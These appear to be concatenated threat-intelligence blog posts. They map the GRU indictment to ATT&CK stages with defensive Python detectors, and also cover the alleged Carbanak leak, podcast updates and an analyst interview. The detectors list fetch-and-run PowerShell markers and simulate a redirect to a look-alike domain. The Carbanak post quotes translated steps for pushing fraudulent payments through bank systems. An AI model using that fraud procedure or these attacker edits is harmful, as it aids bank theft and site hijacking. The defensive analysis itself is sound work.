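        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


# Constructs that send a visitor elsewhere: meta refresh, JavaScript location
# changes and forms posting off-site. Indicative, not exhaustive.
REDIRECT_RE = re.compile(
    r"""http-equiv\s*=\s*["']refresh["']|window\.location|location\.href|document\.location|<form[^>]+action\s*=\s*["']https?://""",
    re.IGNORECASE)


def redirect_indicators(root, changed_paths):
    """Scan only the files that changed and return the redirect constructs found."""
    hits = {}
    for rel in changed_paths:
        with open(os.path.join(root, rel), "r", encoding="utf-8", errors="replace") as fh:
            found = sorted({m.group(0).lower() for m in REDIRECT_RE.finditer(fh.read())})
        if found:
            hits[rel] = found
    return hits


def demo():
    """Take a baseline, simulate an edit made with stolen site credentials, re-check."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "donate"))
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<html><body><h1>Welcome</h1></body></html>")
        with open(os.path.join(root, "donate", "index.html"), "w") as f:
            f.write('<html><body><form action="/pay">...</form></body></html>')
        baseline = hash_tree(root)          # taken at deploy time, stored off-host

        # Attacker edits the donations page and drops a script so visitors land
        # on a look-alike domain (placeholder name, constructed for the demo).
        with open(os.path.join(root, "donate", "index.html"), "w") as f:
            f.write('<meta http-equiv="refresh" content="0;url=https://lookalike.example/">')
        with open(os.path.join(root, "s.js"), "w") as f:
            f.write("window.location='https://lookalike.example/';")

        changes = diff_manifests(baseline, hash_tree(root))
        changes["redirects"] = redirect_indicators(root, changes["added"] + changes["modified"])
        return changes


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two practical points. Keep the baseline manifest off the web host (and regenerate it as part of the deploy pipeline): an attacker who can edit the site with stolen credentials can usually edit a baseline stored beside it. And treat every non-empty diff as a change-management question first ("which ticket authorised this?") rather than a malware question; the redirect heuristic just decides how loudly to ask.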

Stage #3 Execution

ATT&CK TTP: User Execution

Once the GRU successfully compromised its targets, it deployed its malware implants to establish a foothold. The indictment describes this occurring after a successful spearphishing campaign. Most likely a variety of complementary techniques were used. The GRU used a custom, cross-platform toolkit called “X-Agent”, which was developed in-house for this purpose. X-Agent is a Remote Access Trojan (RAT) that has the ability “to monitor individual employees’ computer activity, steal passwords, and maintain access to the DCCC network”.

One key finding is that the GRU relied on the Linux version of the toolkit, which remained undetected on the target’s network after the Incident Response effort had begun four months previously.

DS Mitigation advice: Up-to-date antivirus and other Endpoint Detection & Response (EDR) systems can provide protection against some malware variants. Protective monitoring can help detect unauthorized behavior both on the endpoint and on the network. Ensuring that security teams have knowledge and understanding of all environments in use, not just the Windows estate, assists with rooting out adversaries that are capable of operating on different platforms.

Stage #4 Privilege Escalation

The indictment does not contain any directly obvious reference to privilege escalation. This fact in itself is interesting. For the GRU’s mission, that is, data theft, privilege escalation was not necessary in order to achieve its goals.

DS Mitigation advice: Patching operating systems and applications to prevent privilege escalation is important, as well as limiting who has access to admin accounts. It is worth keeping in mind that adversaries may not always need administrative access in order to achieve their goals. Privileged Identity Management (PIM) and Privileged Access Management solutions can provide added oversight to prevent accounts being misused and abused.

Stage #5 Persistence

ATT&CK TTP: Bootkit, Login Item, Modify Existing Service, Valid Accounts, Launch Agent, etc.

As mentioned previously, the GRU deployed implants for a variety of systems, which allowed it to persist in the target environment despite active Incident Response (IR) processes. The indictment does not go into detail as to how the GRU maintained persistence to survive reboots etc. during their standard operational procedure. However, open source reporting shows that the GRU also used a number of other persistence mechanisms, such as modifying logon scripts, modifying registry keys, and scheduled tasks.

DS Mitigation advice: Maintaining presence in a target environment typically requires the use of administrator privileges. Following the advice in Stage #4, as well as monitoring for the creation of new scheduled tasks, as an example, can limit the adversary’s options. The NCSC Windows 10 End User Device (EUD) guidance provides advice on how to securely configure Windows devices. The NCSC website also has excellent advice on how to securely administer a Windows network.
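Monitoring for new scheduled tasks is cheap once "Audit Other Object Access Events" is enabled, because Windows writes Security event 4698 (a scheduled task was created) with the full task definition in the TaskContent field. The following added example (not Digital Shadows code) parses that event and applies two triage rules: the task's binary lives in a user-writable location, or the action is hidden or encoded PowerShell. The events are constructed here to match the 4698 EventData layout; host, user and paths are placeholders.

```python
"""Triage Windows Security event 4698 (scheduled task created) for persistence.

Added example, not from the original post. Events are constructed below to
resemble the 4698 EventData layout (SubjectUserName, TaskName, TaskContent);
host name, user names and paths are placeholders.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a standard user can write to; legitimately deployed tasks rarely run
# from here, user-level persistence very often does.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# PowerShell switches and idioms that hide or obfuscate what is being run.
PS_MARKERS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
              "downloadstring", "iex ")


def parse_4698(event_xml):
    """Return {user, task_name, actions:[(command, arguments)]} or None if not a 4698."""
    root = ET.fromstring(event_xml)
    if root.findtext("e:System/e:EventID", namespaces=EVT_NS) != "4698":
        return None
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", EVT_NS)}
    # TaskContent is the task definition XML, escaped inside the event. The event
    # parser has already unescaped it, so it can be parsed as XML directly.
    task = ET.fromstring(data.get("TaskContent") or "<Task/>")
    actions = []
    for ex in task.findall(".//t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", default="", namespaces=TASK_NS)
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS)
        actions.append((cmd.strip(), args.strip()))
    return {"user": data.get("SubjectUserName", ""),
            "task_name": data.get("TaskName", ""), "actions": actions}


def triage_task(parsed):
    """Return the reasons a task looks like persistence (empty list = nothing seen)."""
    reasons = []
    for cmd, args in parsed["actions"]:
        low = (cmd + " " + args).lower()
        if any(marker in cmd.lower() for marker in USER_WRITABLE):
            reasons.append("command runs from user-writable path: %s" % cmd)
        if "powershell" in low and any(m in low for m in PS_MARKERS):
            reasons.append("hidden/encoded PowerShell action: %s %s" % (cmd, args))
    return reasons


# --- constructed sample events ---
TASK_XML = ('<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>'
            '<Actions Context="Author"><Exec><Command>COMMAND_PLACEHOLDER</Command>'
            '<Arguments>ARGS_PLACEHOLDER</Arguments></Exec></Actions></Task>')


def make_event(user, task_name, command, args):
    """Build a constructed 4698 event carrying the given task definition."""
    task = (TASK_XML.replace("COMMAND_PLACEHOLDER", escape(command))
                    .replace("ARGS_PLACEHOLDER", escape(args)))
    return ('<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            '<System><EventID>4698</EventID><Computer>WS01.corp.example</Computer></System>'
            '<EventData><Data Name="SubjectUserName">%s</Data>'
            '<Data Name="SubjectDomainName">CORP</Data>'
            '<Data Name="TaskName">%s</Data>'
            '<Data Name="TaskContent">%s</Data></EventData></Event>'
            % (escape(user), escape(task_name), escape(task)))


SUSPICIOUS_EVENT = make_event("jdoe", r"\Microsoft\Windows\Updater",
                              r"C:\Users\jdoe\AppData\Roaming\svchost.exe", "-k netsvcs")
BENIGN_EVENT = make_event("svc_backup", r"\Corp\NightlyBackup",
                          r"C:\Program Files\Backup\backup.exe", "--full")

if __name__ == "__main__":
    for evt in (SUSPICIOUS_EVENT, BENIGN_EVENT):
        parsed = parse_4698(evt)
        print(parsed["task_name"], "->", triage_task(parsed) or "no indicators")
```

The suspicious sample is the classic shape: a task name placed under \Microsoft\Windows so it blends in, running a binary named after a system process but dropped in the user's profile. The same two rules transfer directly to 4702 (task updated) and to Sysmon process-creation events whose parent is the Task Scheduler service.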

Stage #6 Collection

ATT&CK TTP: Data from Local System/Network Shared Drive, Email Collection, Input Capture, Screen Capture, Data Staged, Data from Information Repositories

The GRU team’s mission was to steal data (in particular, research and planning documents) for later use in influence operations. In order to complete this mission, it performed the following actions:

  • Took keylogs and screenshots of targets including capturing the DCCC’s online banking information and passwords in use.
  • “[R]esearched PowerShell commands related to accessing and managing the Microsoft Exchange Server”. This activity was directly related to the theft of thousands of emails from the target organizations.
  • Gained access to the target’s analytics machines that were hosted by a cloud provider. “These computers contained test applications related to the DNC’s analytics. After conducting reconnaissance, the Conspirators gathered data by creating backups, or “snapshots,” of the DNC’s cloud-based systems using the cloud provider’s own technology. The Conspirators then moved the snapshots to cloud-based accounts they had registered with the same service, thereby stealing the data from the DNC”.

DS Mitigation advice: Large amounts of storage being used up unexpectedly is another signal that something potentially suspicious is occurring. Monitoring of key servers to ensure that only specific scripts, such as approved PowerShell scripts, are able to run, and that the appropriate logging is in place to record PowerShell and other scripting activity, is important. Audit logs for cloud services (e.g., AWS CloudTrail) need to be periodically reviewed to ensure that sensitive data is not subject to unauthorized access.
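The snapshot technique in the indictment leaves a very specific trail in CloudTrail: a snapshot (or AMI) is created, and then its attributes are modified to grant another account permission to create volumes from it. Reviewing the log periodically is good; alerting on that second step as it happens is better. The following added example (not Digital Shadows code) does that over CloudTrail records. The records are constructed here and trimmed to the fields the check uses, and the account IDs are placeholders.

```python
"""Flag EC2 snapshots or AMIs being shared with accounts you do not own.

Added example, not from the original post. Records below are constructed to
match the CloudTrail fields the check reads (eventName, requestParameters,
userIdentity, sourceIPAddress); account IDs and ARNs are placeholders.
"""

OWN_ACCOUNTS = {"111111111111"}      # placeholder: the AWS account IDs you control


def _added_principals(params, key):
    """Yield ('user', account_id) / ('group', name) from <key>.add.items."""
    for item in (params or {}).get(key, {}).get("add", {}).get("items", []):
        if "userId" in item:
            yield ("user", item["userId"])
        if "group" in item:
            yield ("group", item["group"])


def find_external_sharing(records, own_accounts=OWN_ACCOUNTS):
    """Return one alert per snapshot/AMI permission granted outside own_accounts."""
    alerts = []
    for rec in records:
        name = rec.get("eventName")
        params = rec.get("requestParameters") or {}
        if name == "ModifySnapshotAttribute":
            target, key = params.get("snapshotId"), "createVolumePermission"
        elif name == "ModifyImageAttribute":
            target, key = params.get("imageId"), "launchPermission"
        else:
            continue                     # CreateSnapshot etc. are normal on their own
        for kind, who in _added_principals(params, key):
            if kind == "group" and who == "all":
                reason = "made public"
            elif kind == "user" and who not in own_accounts:
                reason = "shared with external account %s" % who
            else:
                continue                 # shared within our own accounts
            alerts.append({
                "time": rec.get("eventTime"),
                "actor": (rec.get("userIdentity") or {}).get("arn"),
                "source_ip": rec.get("sourceIPAddress"),
                "event": name, "resource": target, "reason": reason,
            })
    return alerts


# Constructed records in the shape CloudTrail delivers inside its "Records" array.
ACTOR = {"arn": "arn:aws:iam::111111111111:user/analytics-admin", "accountId": "111111111111"}
SAMPLE_RECORDS = [
    {"eventTime": "2018-04-28T02:10:11Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "CreateSnapshot", "sourceIPAddress": "203.0.113.7", "userIdentity": ACTOR,
     "requestParameters": {"volumeId": "vol-0a1b2c3d", "description": "analytics db"}},
    {"eventTime": "2018-04-28T02:14:52Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "ModifySnapshotAttribute", "sourceIPAddress": "203.0.113.7",
     "userIdentity": ACTOR,
     "requestParameters": {"snapshotId": "snap-0123456789abcdef0",
                           "attributeType": "CREATE_VOLUME_PERMISSION",
                           "createVolumePermission": {"add": {"items": [{"userId": "999999999999"}]}}}},
    {"eventTime": "2018-04-28T03:01:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "ModifySnapshotAttribute", "sourceIPAddress": "198.51.100.4",
     "userIdentity": ACTOR,
     "requestParameters": {"snapshotId": "snap-0fedcba9876543210",
                           "attributeType": "CREATE_VOLUME_PERMISSION",
                           "createVolumePermission": {"add": {"items": [{"userId": "111111111111"}]}}}},
    {"eventTime": "2018-04-28T03:05:30Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "ModifyImageAttribute", "sourceIPAddress": "203.0.113.7",
     "userIdentity": ACTOR,
     "requestParameters": {"imageId": "ami-0abcdef1234567890", "attributeType": "launchPermission",
                           "launchPermission": {"add": {"items": [{"group": "all"}]}}}},
]

if __name__ == "__main__":
    for alert in find_external_sharing(SAMPLE_RECORDS):
        print(alert["time"], alert["event"], alert["resource"], alert["reason"], alert["actor"])
```

Wire this to CloudTrail delivery (CloudWatch Events or the S3 log bucket) rather than a weekly review; the gap between the share and the copy into the attacker's account is minutes. The same principal creating an unusual burst of CreateSnapshot calls, or CopySnapshot to a region you never use, is the earlier and noisier signal, and an allow-list of accounts that may legitimately receive snapshots keeps the rule quiet in environments that share AMIs between a build account and production.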

Stage #7 Exfiltration

ATT&CK TTP: Data Compressed, Data Encrypted, Exfiltration Over Other Network Medium

Once the GRU had collected its targeted data, it needed to move that data out of the target environments for analysis. The GRU then:

  • Compressed and exfiltrated the files that it gathered out of the target networks using the custom “X-Tunnel” tool to an external machine.

DS Mitigation advice: Blocking egress traffic that is not necessary for the organization’s requirements can assist with limiting an attacker’s options in terms of communicating outside of the organization. Web proxies can provide granular controls for restricting egress traffic types and destinations.


The GRU tradecraft presented in the indictment is not necessarily the most technically sophisticated in terms of 0day exploits and exotic command and control (C2) techniques. However, it points to an exceptionally determined adversary. It uses a variety of TTPs in order to compromise its targets and is constantly hunting for the weak points in its targets’ defenses.

Digital Shadows recommends a defense in depth approach to dealing with high-capability adversaries. That is, multiple, partially overlapping security controls that mutually reinforce each other in order to provide increased resiliency to network intrusions. While it may not be possible to keep out all types of adversaries, the more difficult they find it to compromise an organization, the fewer adversaries will be capable of successfully breaching the organization’s defenses.

To learn more, listen to our podcast episode on this topic below:

Digital Risk Protection: Avoid Blind Spots with a More Complete Risk Picture Tue, 17 Jul 2018 01:20:08 +0000 “Digital Shadows leads the pack for digital risk protection providers.” Digital Shadows’ customers have been telling us this for years, and now Forrester Research has included us among the vendors who “lead the pack” in the recently released report The Forrester New Wave™: Digital Risk Protection Q3 2018. The Forrester Research report also stated, “Customers extol Digital Shadows for its robust digital risk data and ability to deliver on an aggressive product road map, citing a new queryable deep and dark web search feature as evidence.”

This recognition as a “Leader” continues Digital Shadows’ leadership in digital risk management. We were also named a leader in The Forrester Wave™: Digital Risk Monitoring, Q3 2016.


For me, this milestone and the previous recognition as a leader have been very satisfying. When I left Forrester Research, I wanted to help security leaders and security practitioners to better understand their external risks. Digital Shadows is doing this, and I’m proud to make our customers’ lives easier.

What is Digital Risk Protection?

Digital risk protection consists of monitoring and remediating external risk exposure online. Forrester describes DRP solutions as those that “offer rapid event detection and remediation capabilities so companies can fix issues before bad actors exploit them…. and to limit the effects of successful attacks when they occur.” In this blog, I take a look at the current state of digital risk protection and where I see its future.

The Current State of Digital Risk Protection

One of the topics I frequently discuss with my fellow CISOs is the urgent need to have the most comprehensive view of risks possible. We have such limited resources, and if we are going to effectively leverage our people and budget, we need a more complete risk picture. If you look back over the years, we have an affinity for risk blind spots:

  • Virtual servers. When VMware ESX started getting deployed, the security teams were hands-off as there weren’t any “mission critical workloads” running on them. How long did that last?
  • iPhone (mobile phones). We didn’t fully appreciate the amount of sensitive data that would be on the iPhones. Containerization and Mobile Device Management solutions emerged to address these risks.
  • iPad (tablets). Ever hear stories about radiologists using iPads with unencrypted personal health data on them? Yeah, me neither. #Sarcasm.
  • “We aren’t using the cloud?” Ever hear this? I hear it frequently. Meanwhile: Box, Dropbox, iCloud and others are running with little understanding of the risks. Cloud Access Security Brokers emerged to address these risks.

I place external digital risks and digital risk protection in this category. If we don’t have a better understanding of our digital footprints and what is happening beyond our boundary, we are once again putting our heads in the sand.

Forrester Research discusses these challenges: “Security and risk professionals face an intimidating task: protect vital, incredibly distributed digital footprints without direct control or ownership. It’s a major challenge just to understand an organization’s far-reaching digital ecosystem, let alone protect it.” – New Tech: Digital Risk Protection, Q2 2018

In this new Digital Risk Protection Wave, Forrester adds “Security pros are turning to digital risk protection (DRP) solutions to deal with the heightened exposure their organizations’ digital infrastructure, assets, and accounts face online.”

I’m delighted with how Digital Shadows fared in this report, especially in terms of what we consider to be validation that our service, SearchLight, received from Forrester and our clients. You can download your own copy of the Forrester New Wave here, but here are my takeaways from the report and thoughts on Digital Shadows:

  • Digital Risk Protection Breadth and Depth in One Tool. We’ve always believed that Digital Risk Management needs to encompass a wide range of sources and should not be siloed to specific areas of online activity. Our coverage of criminal forums, dark web pages, Telegram, social media, search engines, code-sharing sites, paste sites (to name a few) helps us to excel in this area.
  • Strong Dark Web Visibility and Recon Capabilities. As organizations seek to better understand their exposure, we understandably get a lot of questions about the dark web. We’ve been monitoring dark web pages and criminal forums since before it was trendy. More recently, we’ve released Shadow Search; a new feature in our portal that allows our customers to query this information and set up their own alerts.
  • Leading Risk Remediation. It’s great to be able to detect risks online, but if a provider can’t help to remediate this, then you haven’t solved much. In every alert, our analyst team provides context and recommended actions, including the use of our templated and managed takedowns.
  • Industry-Leading Dashboard. We deliver our clients a quick and visual way of understanding their digital risks. Our main dashboard showcases the latest customer-specific alerts so that our clients can immediately identify their top priorities. Extra tabs for our intelligence database, incidents, reporting, and takedowns are also easily-navigable.
  • Rich Partner Ecosystem. Organizations shouldn’t be penalized for consuming our intelligence in ways that make the most sense for them. That’s why we’ve been building out a rich partner ecosystem over the past 2 years. This provides organizations with turnkey integrations into SIEMs, Threat Intelligence Platforms, ticketing systems and automation platforms.
  • Global Reach and Analyst Expertise. Technology is important, but the true power comes when it is combined with analyst expertise. Our analysts help to remove false positives (freeing up time for you), add context, and respond to Requests for Information (RFIs).

If you want to read more on digital risk protection, download the full Forrester New Wave Report.

ShadowTalk Update – 07.16.2018 Mon, 16 Jul 2018 19:09:12 +0000 In this week’s ShadowTalk, Digital Shadows’ Russian-speaking security specialist discovered files and source code allegedly related to the Carbanak organized criminal group. The Carbanak malware is a backdoor used by the Anunak (Carbanak) Group to infiltrate financial institutions and steal funds. Richard Gold and Simon Hall join Rafael Amado to discuss the implications for financial services from these revelations. We ask whether this leak represents a threat to organizations, and how businesses can best defend themselves from the techniques used by sophisticated financial criminal groups such as Carbanak. Listen to the latest podcast or read our blog to find out more. 



Middle Eastern entities continue to attract cyber attacks

Two APT phishing campaigns have recently been targeting Middle Eastern institutions. Iranian APT group “Charming Kitten” has been linked to a phishing campaign that used a spoofed version of the website of Israeli cyber-security company ClearSky. Charming Kitten used the spoofed website to host login fields to harvest credentials, but the site was taken offline within three hours of creation. Also during the past week, an APT spearphishing campaign targeted the Palestinian National Authority, along with other Middle Eastern entities. Malicious emails containing a decoy document were sent in conjunction with a malicious executable file. That campaign has not been attributed to a specific group, but there are several similarities to the work of cyber espionage group “Gaza Cybergang”. Given the political climate in the Middle East, comparable activity will likely continue over the medium to long term (from three months to more than a year).


Ransomware adopts cryptocurrency miner as alternative payload

A new variant of the Rakhni ransomware was reported on 05 Jul 2018 by cyber security company Kaspersky. Rakhni, first identified in 2013, uses emails containing weaponized documents to entice victims into inadvertently launching a malicious executable. However, the new variant also scans systems to determine the presence of a Bitcoin folder and confirm whether they have one or two logical processors. Depending on the victim’s machine, the malware would encrypt files and demand a ransom, install a cryptocurrency miner or deploy a worm to spread to additional devices. The incorporation of an alternative cryptocurrency payload into a traditionally ransomware-focused variant means that threat actors are still targeting cryptocurrencies, finding this method profitable and effective.


Alleged Carbanak Files and Source Code Leaked: Digital Shadows’ Initial Findings Wed, 11 Jul 2018 23:02:30 +0000 Digital Shadows’ Russian-speaking security team discovered a post from 6 July 2018 on exploit[.]in that provided files and source code that were allegedly related to the Carbanak group. On 11th July, these download links were added to Pastebin. We reviewed these files to understand the implications for financial services organizations. Here are our initial findings.

Confusion surrounding the source of the leaks

The Carbanak malware is a backdoor used by the Anunak (Carbanak) Group to infiltrate financial institutions and to exfiltrate funds from the target organization. Since September 2015, a new version of the malware has been in circulation (dubbed Carbanak 2.0), and its use was not limited to the activity of the Anunak Group. For example, Carbanak 2.0 has been for sale for $6,000 on criminal forums since 2016 (see Figure 1). In March 2018, law enforcement, who estimated that Carbanak had made over $1 billion, claimed to have caught the mastermind of the Carbanak group.


Figure 1: Carbanak 2.0 offered for sale on Altenen[.]com on 23 July 2016


In this latest development, source code and files that purport to be from the group’s campaigns have been leaked, although there are significant doubts as to whether the malware is actually Carbanak or another family altogether.

We also do not know enough about the actors behind the leak and the motivations behind leaking these files and source code. Another post on the same forum, from 10 July, purported to be an archive for Buhtrap (meaning “Accountant Trap”), which also contained code. While this was reportedly leaked several years back, it had not become public.

Malware source code is leaked for a variety of reasons, including by competitors or law enforcement. In the case of the Nuclear Bot banking trojan, this was leaked by the author to gain community trust.


Observations from the alleged Carbanak Leak

Regardless of the identity of the group behind these exposed files, or whether this is Carbanak, this data provides insight into how financial organizations are targeted by criminal groups. After analyzing these files and code, our key findings are:

1. Pegasus (the name of the leaked malware) leverages a range of features to get the job done. Pegasus is a toolset for generating fraudulent payment requests that contain a host of features, including: full-featured Remote Access Trojan (RAT) with credential harvesting, a modified version of Mimikatz, SMB named pipe communication, and a KBRI module for intercepting KBR (a Russian payment system) data exchanges.


Figure 2: A screenshot of a leaked text file

Translation: “mod_KBRI

Module of substitution of payments in the CBD


Module-injector to intercept the process of CBD data exchange and receive from mod_KBRI the swapped data”

2. The group behind the malware has detailed knowledge of bank systems. The leaked files contained a detailed set of instructions on how banks’ fraud detection systems work. This included a 99-point checklist of fraud detection mechanisms and details on how transactions are blacklisted, for example, if the sender’s passport is registered as lost. Organizations should be mindful of the information they expose about their anti-fraud solutions, which evidently provides a key resource for attackers.

3. The group shares detailed instructions into how to make fraudulent payments. The dump included instructions on how to use the toolset for making fraudulent payments. This includes details on the payment workflow regarding how payments are made and approved. Further details are provided on how payment files are moved through the payment system via the transport gateway. The instructions describe under which circumstances a payment is automatic or requires manual approval (the significance of this is provided in observation #5).


Figure 3: A screenshot of the text file containing detailed advice on making fraudulent payments

Translation: “In general, to send your payment through the Central Bank client automated workstation it is necessary:

      1) Find related to the exchange with the Central Bank client automated workstation for the key process uarm.exe and the gateway sending type Astra (AstraC.exe) or UTA (Program Files \ Bank of Russia \ UTA)

      2) In large banks, one or both components may be missing, and their role is to perform specialized software. Either the installation location may not be visible. In such cases, it is necessary to investigate the bank automation solutions (RS-Bank, Diasoft, etc.), file servers, to find out how the payment file is exchanged.

      3) From the Central Bank client automated workstation merge logs (uarm \ log \ folders with date) for the last 7-14 days. On the basis of logs find out the on-off time, the frequency of flights, the settings for file sharing. Depending on the settings, the Central Bank client automated workstation can perform file signing automatically when it appears in certain folders, or the operator (or some other person) may require some intervention to move the file to the desired folder.”


4. Full development cycle used to produce their malware. The campaign appears to produce custom malware kits for specific audiences. There is a large amount of code as part of Pegasus, but it’s clear that the group is happy to integrate more tools, should it be appropriate for the job.

5. Key personnel of banks listed. Several spreadsheets were in the dump, including active directory backups and a separate list of over 1,000 individuals responsible in senior positions across a range of banks.


The threat to organizations

Despite the source code being available to the public, it’s unlikely that other cybercriminals will make use of the advice for targeting banks’ anti-fraud solutions given the complexity and specificity of the code base. As for the Mimikatz source code, there are indications that the code only affects older versions of Windows (see the tweet from the author of Mimikatz on this point).

While the source of the leaked files and source code is unknown, they do provide a good insight into the extent of information attackers collect on their targets, and how the groups bypass their controls.

Although many of these targets were Russian-based banks, global banks should consider paying attention to suspicious logs that have previously been dismissed, review permissions and revoke them as necessary. As always, we advocate defense-in-depth as the best form of mitigation.

Furthermore, it’s important to remember the human factor. The exposed spreadsheets of individuals in influential positions remind us that criminals target people as well as technology. This information is particularly relevant for those individuals responsible for handling payments, who make attractive targets. Organizations should ensure that privileges are reviewed and revoked if necessary.

This post details our initial findings, and we will look to be producing further analysis in the coming week.

Listen to our podcast on this topic here:

To stay up to date with the latest Digital Shadows threat intelligence and research, subscribe to our emails here.

Security Analyst Spotlight Series: Harrison Van Riper Tue, 10 Jul 2018 16:05:10 +0000 Organizations rely on our cyber intelligence analysts to be an extension of their security team. Our global team of analysts provide relevant threat research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient. Crucially, by having analysts within the intelligence and collection cycle, we’re able to minimize the real-time false positives that cause nightmares for most organizations.

In our Security Analyst Spotlight Series, we bring our analysts out of the shadows and into the spotlight, showcasing their expertise and interests so you can learn a bit more about a “day-in-the-life” of a Digital Shadows Intelligence analyst.

Name: Harrison Van Riper
Team: Strategic Research
Title: Senior Analyst

Q: How did you get into the field of cybersecurity?

A: While I was earning my bachelor’s degree in Criminal Justice, I took a cybercrime class and it was like something clicked in my head: there was this whole other side of crime that was relatively understudied, but becoming increasingly important. So, when I decided to pursue my graduate degree in Information Technology, I chose to focus on cybersecurity.

One of my professors during my graduate program introduced me to the idea of cyber intelligence analysis, and that’s when I discovered that “cyber threat intelligence” was a relatively new function that businesses and governments were incorporating, and it seemed like a natural entry point with my background.


Q: What areas of cyber security are you most interested in?

A: I’m really interested in how geopolitics affects the cyber security threat landscape, so Advanced Persistent Threat (APT) groups that are linked to nation-states fascinate me. Usually, these groups are linked with espionage activity, driven by the objectives of their respective country governments. Government entities usually receive the brunt of media coverage, but all kinds of organization could be targeted by a nation-state group; for instance, Chinese APT groups have been observed conducting intellectual property theft to support the Chinese government’s manufacturing needs. While these types of actors are most famously linked to activity against Presidential campaigns (i.e. APT-28, Guccifer 2.0 and the 2016 United States Presidential election), political entities are not the only targets.

Recently, I have been looking into cryptocurrency, researching not only how and why criminals use it, but the risks that financial services companies take on by exposing themselves to this new technology. One of our financial services forecasts we put together at the beginning of 2018 incorporated the sudden rise of cryptocurrencies and blockchain technology as well as the increased discussions regarding potential adoption by financial institutions. There are a lot of different threat vectors that exist within these areas, some of which aren’t fully understood yet even by the cybersecurity industry. But that’s why I am so interested!


Q: What has been your favorite online investigation to work on?

A: A customer came to us with a request for information regarding a publicly reported data breach. An extortion email was sent to the customer stating that as a result of the breach, the attackers had stolen several internal and confidential assets. I’ve done plenty of online investigation training, and I used these skills to analyse the email headers from the extortion letters for an IP address that was linked to infrastructure that had previously been used by a high-profile espionage threat actor. I also discovered that the usernames associated with the extortion email addresses were loosely linked to an identifiable individual through their social media accounts and other email addresses they used. From here we were able to do further profiling of the individual to determine whether they were a credible threat. That was definitely a great feeling to have a tangible and observable line of research that produced a good deliverable for a customer.


Q: What do you do outside work that helps with your job?

A: I try and stay as up to date with current events outside of the cybersecurity bubble as I can. A lot of research goes into cybersecurity reporting, but it’s important to remember that events don’t operate in a vacuum. I think it’s important to look at outside factors that could influence something like a corporate espionage campaign or a denial of service (DoS) attack – such as an increase in geopolitical tensions between states. I also try to work on my technical proficiency by improving my Maltego, Kali Linux and Wireshark skills.


Q: What’s the biggest lesson you’ve learned while training as an intelligence analyst?

A: Be comfortable with receiving criticism for your writing, especially in the beginning. The job of an intelligence analyst is to produce reports that are (usually) heavily text-based, and it would be extremely rare to get something just right on the first draft. But that’s okay! You learn from criticism. I know that I am a better writer today because of the amount of feedback I’ve received on all my reports. At Digital Shadows the analysts all receive specific training on how to produce intelligence reports, learning about the need to be concise and, crucially, precise. Clients don’t have time to read through streams of prose trying to work out what you might be saying.

Additionally, every intelligence shop will have their own “house style guide”. Different reports will be geared for different audiences; if I’m writing a report for a security operations centre (SOC) team then the content will be far more technical than a presentation for a Chief Information Security Officer or board member. The latter are more focused on the broader, more strategic business risks, and it’s important to frame your reporting along these lines so that they see the most value in it.


Interested in hearing more from our intelligence team? Check out our blogs or subscribe to our weekly threat intelligence podcast, ShadowTalk.


Harrison Van Riper is a Senior Analyst for the Strategic Research team at Digital Shadows. He earned his Bachelor’s degree in Criminal Justice and Master’s degree in Information Technology and Management. Harrison is fascinated by the crossover between technology and crime and provides Digital Shadows’ clients with up-to-date threat intelligence.

ShadowTalk Update – 07.09.2018 Mon, 09 Jul 2018 15:28:17 +0000 In this week’s ShadowTalk, Richard Gold and Simon Hall join Rafael Amado to discuss SSL (Secure Sockets Layer) interception, a technique used to inspect HTTPS (Hypertext Transfer Protocol Secure) traffic sent between a client and a webserver.

On 30 June, an important Payment Card Industry deadline passed that requires all websites that accept payment cards to stop supporting TLS 1.0 (Transport Layer Security). With man-in-the-middle attacks and data interception being one of the primary security concerns for TLS 1.0 and older protocols such as SSL, the pod looks into how organizations are also employing interception techniques for their own security and monitoring purposes. We’ll look into how SSL interception is done, the different reasons for deploying it, and the overall trade-offs for organizations looking to implement these methods.


Typeform breach signifies rising threat to data-collection companies

Data-collection and -analysis company Typeform stated that an unknown cyber-threat actor breached the company’s partial backup data, relating to client names, email addresses, employers and salaries, among other details. The breach affected a wide variety of companies and information. Personally Identifiable Information (PII) is an increasingly valuable and monetizable commodity for threat actors, who can sell it on criminal marketplaces; use it to commit fraud, such as financial theft or identity theft; or extort the company that held it. With the growing amount of data placed online by individuals, and held online by companies, data collection and aggregation companies are increasingly being targeted. In addition, new requirements set out in the EU’s General Data Protection Regulation (GDPR) mean there will simply be more breaches publicly reported.


Hamas aims malicious apps at Israel’s military forces

A new cyber campaign targeting members of the Israeli Defense Forces has been attributed to the Palestinian Sunni-Islamist organization Hamas. The attackers exploited users’ trust in the Google Play store to upload fraudulent apps. The apps either referred to the 2018 FIFA World Cup or impersonated dating and fitness apps. Once downloaded, the apps collected sensitive information stored on the devices. Hamas conducted similar attacks against the IDF in January 2017.


Database of 340 million records left exposed by Exactis

Data-marketing and -aggregation firm Exactis left exposed a database of 340 million records containing PII of 230 million United States citizens and 110 million businesses. It is not known whether malicious actors were able to gain access to this database. Such data is likely to be valuable to threat actors for targeting spearphishing and spam campaigns, as well as in general attacks, such as brute-force cracking account security questions.


RIG exploit kit uses PROPagate to deliver cryptocurrency miner

